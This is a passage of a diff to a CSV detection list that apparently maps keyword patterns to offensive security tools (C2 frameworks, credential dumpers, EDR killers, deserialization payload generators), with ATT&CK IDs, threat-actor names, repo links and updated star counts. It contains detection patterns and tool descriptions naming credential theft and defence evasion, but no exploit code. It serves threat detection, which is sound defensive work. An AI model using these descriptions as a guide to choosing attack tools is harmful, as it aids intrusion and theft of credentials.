T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Y29iYWx0c3RyaWtl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*yanncam/ShuckNT*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" 
@@ -18570,45 +18758,46 @@ "*Yay! No SYSMON here!*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*YDHCUI/csload.net*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*YDHCUI/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" -"*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" -"*ylAo2kAlUS2kYkala!*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. 
The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*yeelight_discover.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*ylAo2kAlUS2kYkala!*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. 
The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*Yml0c3kubWl0LmVkdQ==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmxvY2s9MTAw*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*yogeshojha/rengine*","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","5904","923","2023-10-02T14:05:29Z","2020-05-03T12:13:12Z" +"*yogeshojha/rengine*","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. 
reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","5913","923","2023-10-02T14:05:29Z","2020-05-03T12:13:12Z" "*YOLOP0wn/POSTDump*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*You are trying to target a User Group Policy Object while running the embedded SMB server*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*You are trying to target a User Group Policy Object while running the embedded SMB server*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*You_spin_me__round.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*youcantpatchthis*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*youhacker55/PayGen*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","","N/A","","","" -"*Your Moms Smart Vibrator*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*ysoserial -*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*ysoserial-*.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*ysoserial.exe *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Your Moms Smart Vibrator*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*ysoserial -*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial-*.zip","offensive_tool_keyword","ysoserial.net","Deserialization 
payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.exe *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*ysoserial.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" -"*ysoserial.net*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET 
formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*ysoserial.sln*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.net*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.sln*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*yunuscadirci/CallStranger*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "*Yuuup!! 
Pass Cracked*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*YwBhAGwAYwA=*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*Z4nzu/hackingtool*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*Z4nzu/hackingtool*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*zabbix_session_exp.py -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*zabbix_session_exp.py https*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","1","0","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z" "*zabbix_session_exp.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - 
T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*zarp.py*","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","10","1376","340","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z" -"*zblurx/certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*zblurx/certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*zblurx/dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*zcgonvh/DCOMPotato*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" -"*zed2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
-"*zenoss_3x_command_execution*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*zer0condition/mhydeath*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*zed2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*zenoss_3x_command_execution*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
